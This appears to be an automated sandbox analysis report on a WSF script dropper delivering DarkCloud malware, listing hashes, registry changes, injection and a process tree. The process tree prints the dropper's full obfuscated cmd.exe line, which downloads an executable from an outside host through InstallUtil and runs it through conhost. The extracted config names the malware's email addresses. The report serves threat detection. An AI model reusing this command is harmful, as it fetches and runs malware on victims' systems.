Analysis

max time kernel: 145s
max time network: 124s
platform: windows10-2004_x64
resource: win10v2004-20240419-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240419-en, locale:en-us, os:windows10-2004-x64, system
submitted: 03-05-2024 11:33

Static task: static1
Behavioral task: behavioral1
Sample: SOA_XSL.wsf
Resource: win7-20240221-en
General

Target: SOA_XSL.wsf
Size: 795B
MD5: 644ca3a3f10afbeab56d93ce4ad7f0ba
SHA1: ef5dcb8a6e1a1152d116411f784a609c8f870a0a
SHA256: 377180ae7109057e5f8403307834211a4c75a584be3090552cb059e52bf4a192
SHA512: da09d35e3dabf0f4c4d541b0322ca1e2600522d7d41abc6adf04d568a58af8a98e89bbcd83a67869e1becaf6fda412aaf0762f1465e47faceaf06293d1db27ea
Malware Config

Extracted: darkcloud
email_from: igor.bos@vinoterra.ru
email_to: office.tony39@mail.ru
Signatures

Downloads MZ/PE file

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes: WScript.exe
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Control Panel\International\Geo\Nation | WScript.exe
Executes dropped EXE (1 IoC)
Processes: file532024[1].exe
  pid | process
  4444 | file532024[1].exe

Loads dropped DLL (2 IoCs)
Processes: InstallUtil.exe
  pid | process
  1484 | InstallUtil.exe
  1484 | InstallUtil.exe

AutoIT Executable (1 IoC)
AutoIT scripts compiled to PE executables.
Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6WJSJ70T\file532024[1].exe | autoit_exe

Suspicious use of SetThreadContext (1 IoC)
Processes: file532024[1].exe
  description | pid | process | target process
  PID 4444 set thread context of 2940 | 4444 | file532024[1].exe | svchost.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Modifies Internet Explorer settings
Processes: rundll32.exe
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | rundll32.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | rundll32.exe
Modifies registry class (16 IoCs)
Processes: rundll32.exe
  description | ioc | process
  Key created | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content | rundll32.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CachePrefix | rundll32.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CacheLimit = "51200" | rundll32.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CacheLimit = "1" | rundll32.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CacheLimit = "1" | rundll32.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | rundll32.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies\CacheVersion = "1" | rundll32.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CachePrefix = "Visited:" | rundll32.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History\CacheVersion = "1" | rundll32.exe
  Set value (int) | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Content\CacheVersion = "1" | rundll32.exe
  Key created | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Cookies | rundll32.exe
  Key created | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\History | rundll32.exe
  Key created | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\MuiCache | rundll32.exe
  Key created | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache | rundll32.exe
  Key created | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings | rundll32.exe
  Key created | \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Internet Settings\Cache\Extensible Cache | rundll32.exe
Suspicious behavior: MapViewOfSection (1 IoC)
Processes: file532024[1].exe
  pid | process
  4444 | file532024[1].exe

Suspicious use of FindShellTrayWindow (1 IoC)
Processes: rundll32.exe
  pid | process
  3336 | rundll32.exe

Suspicious use of SetWindowsHookEx (1 IoC)
Processes: svchost.exe
  pid | process
  2940 | svchost.exe

Suspicious use of WriteProcessMemory (22 IoCs)
Processes: WScript.exe, cmd.exe, rundll32.exe, conhost.exe, file532024[1].exe
  description | pid | process | target process
  PID 1208 wrote to memory of 768 | 1208 | WScript.exe | cmd.exe (x2)
  PID 768 wrote to memory of 1268 | 768 | cmd.exe | DeviceCredentialDeployment.exe (x2)
  PID 768 wrote to memory of 3336 | 768 | cmd.exe | rundll32.exe (x2)
  PID 3336 wrote to memory of 628 | 3336 | rundll32.exe | rundll32.exe (x2)
  PID 768 wrote to memory of 1484 | 768 | cmd.exe | InstallUtil.exe (x3)
  PID 768 wrote to memory of 2332 | 768 | cmd.exe | cmd.exe (x2)
  PID 768 wrote to memory of 1952 | 768 | cmd.exe | conhost.exe (x2)
  PID 1952 wrote to memory of 4444 | 1952 | conhost.exe | file532024[1].exe (x3)
  PID 4444 wrote to memory of 2940 | 4444 | file532024[1].exe | svchost.exe (x4)
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes

1. C:\Windows\System32\WScript.exe
   "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SOA_XSL.wsf"
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" "/C DeVIceCREDeNTIalDeploymeNt.eXe & RUNdLl32 inEtCPL.cpL , ClearMyTracksByProcess 8 && C:\Windows\MicrosoFT.nEt\frameWORK\v4.0.30319\inStallUtIL https://bshd1.shop/ljeCUBbq/file532024.exe && tiMeoUT /t 7 /NOBrEak > nuL & fOR /f %A in ( ' dIR C:\Users\Admin\AppData\Local\MICrOsOFT\WinDOWS\INETCAChE\IE\ /S /b ' ) Do cONHosT %A"
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\DeviceCredentialDeployment.exe
         DeVIceCREDeNTIalDeploymeNt.eXe
      3. C:\Windows\system32\rundll32.exe
         RUNdLl32 inEtCPL.cpL , ClearMyTracksByProcess 8
         - Modifies Internet Explorer settings
         - Suspicious use of FindShellTrayWindow
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\system32\rundll32.exe
            C:\Windows\system32\rundll32.exe C:\Windows\system32\inetcpl.cpl,ClearMyTracksByProcess Flags:8 WinX:0 WinY:0 IEFrame:0000000000000000
            - Modifies registry class
      3. C:\Windows\MicrosoFT.nEt\frameWORK\v4.0.30319\InstallUtil.exe
         C:\Windows\MicrosoFT.nEt\frameWORK\v4.0.30319\inStallUtIL https://bshd1.shop/ljeCUBbq/file532024.exe
         - Loads dropped DLL
      3. C:\Windows\system32\cmd.exe
         C:\Windows\system32\cmd.exe /c dIR C:\Users\Admin\AppData\Local\MICrOsOFT\WinDOWS\INETCAChE\IE\ /S /b
      3. C:\Windows\system32\conhost.exe
         cONHosT C:\Users\Admin\AppData\Local\MICrOsOFT\WinDOWS\INETCAChE\IE\6WJSJ70T\file532024[1].exe"
         - Suspicious use of WriteProcessMemory
         4. C:\Users\Admin\AppData\Local\MICrOsOFT\WinDOWS\INETCAChE\IE\6WJSJ70T\file532024[1].exe
            C:\Users\Admin\AppData\Local\MICrOsOFT\WinDOWS\INETCAChE\IE\6WJSJ70T\file532024[1].exe
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            - Suspicious behavior: MapViewOfSection
            - Suspicious use of WriteProcessMemory
            5. C:\Windows\SysWOW64\svchost.exe
               C:\Users\Admin\AppData\Local\MICrOsOFT\WinDOWS\INETCAChE\IE\6WJSJ70T\file532024[1].exe
               - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\6WJSJ70T\file532024[1].exe
  Filesize: 1.3MB
  MD5: 99332016403c66ac129b2ab34e97b0ed
  SHA1: 37c0df4ea5fa74972be7619094081dc726cbf665
  SHA256: 3116fd6a924c1f827b67fbf721d6be3ba1ac8a71da15a6dff5548cfce2231650
  SHA512: 351e06565a3e2f8e227dc8f404c5e368553643540f0f9349d780e0973f89be95b1cb286498b42c2851bdc2094032554268d50b0f165548704ef6ecacbb5da00e

memory/1484-0-0x0000000000510000-0x000000000051C000-memory.dmp
  Filesize: 48KB

memory/1484-1-0x0000000000F30000-0x0000000000F4A000-memory.dmp
  Filesize: 104KB

memory/2940-28-0x0000000000400000-0x0000000000460000-memory.dmp
  Filesize: 384KB

memory/2940-29-0x0000000000400000-0x0000000000460000-memory.dmp
  Filesize: 384KB